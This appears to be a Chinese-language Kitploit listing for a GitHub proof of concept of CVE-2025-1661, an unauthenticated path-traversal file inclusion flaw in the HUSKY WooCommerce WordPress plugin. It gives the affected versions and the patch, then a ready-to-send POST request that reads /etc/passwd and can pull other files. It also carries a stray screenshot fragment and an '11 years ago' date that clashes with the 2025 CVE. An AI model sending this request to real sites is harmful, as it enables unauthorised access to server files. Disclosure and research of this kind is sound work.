Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-1661 — HUSKY – Products Filter Professional for WooCommerce WordPress 插件存在本地文件包含(LFI)漏洞。 | Kitploit
工具/GitHubGitHub/shahwarshah/cve-2025-1661
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育
GitHubshahwarshah/cve-2025-1661

CVE-2025-1661

HUSKY – Products Filter Professional for WooCommerce WordPress 插件存在本地文件包含(LFI)漏洞。

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CVE-2025-1661 - HUSKY – Products Filter Professional for WooCommerce 中的未认证本地文件包含(LFI)

描述

WordPress 的 HUSKY – Products Filter Professional for WooCommerce 插件在所有版本中(最高至 1.3.6.5,含该版本)存在 本地文件包含(LFI) 漏洞,该漏洞可通过 woof_text_search AJAX 动作的 template 参数触发。

该漏洞允许未认证的攻击者在服务器上包含并执行任意文件,可能导致以下后果:

  • 绕过访问控制
  • 提取敏感数据
  • 远程代码执行(RCE)(如果满足特定条件,例如上传“安全”文件类型)

严重性:严重

  • CVSS 评分: 9.8(严重)
  • CWE ID: CWE-22(路径遍历)
  • EPS 评分: 0.00061

受影响版本

  • 存在漏洞的版本: <= 1.3.6.5
  • 已修补版本: 1.3.6.6

修复方案

请更新至 1.3.6.6 或更新的已修补版本。


概念验证(PoC)

复现步骤

  1. 访问目标网站。
  2. 使用 Burp Suite 捕获请求。
  3. 将请求方法修改为 POST,并添加以下载荷:
root@kitploit:~
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1  HTTP/1.1
Host: TARGET_SITE_HERE
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: YOUR_SESSION_COOKIE_HERE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

action=woof_text_search&

IntercomVulnChecker Screenshot 4. 如果成功,服务器将返回 /etc/passwd 的内容。 5. 这可被用于提取服务器上的其他敏感文件。


参考资料

  • Wordfence 安全公告
  • WordPress 插件代码
  • CVE 报告

免责声明

此 PoC 仅用于教育和研究目的。未经许可对系统进行未授权测试是非法且不道德的。在进行任何安全测试之前,请务必获得明确授权。

下载工具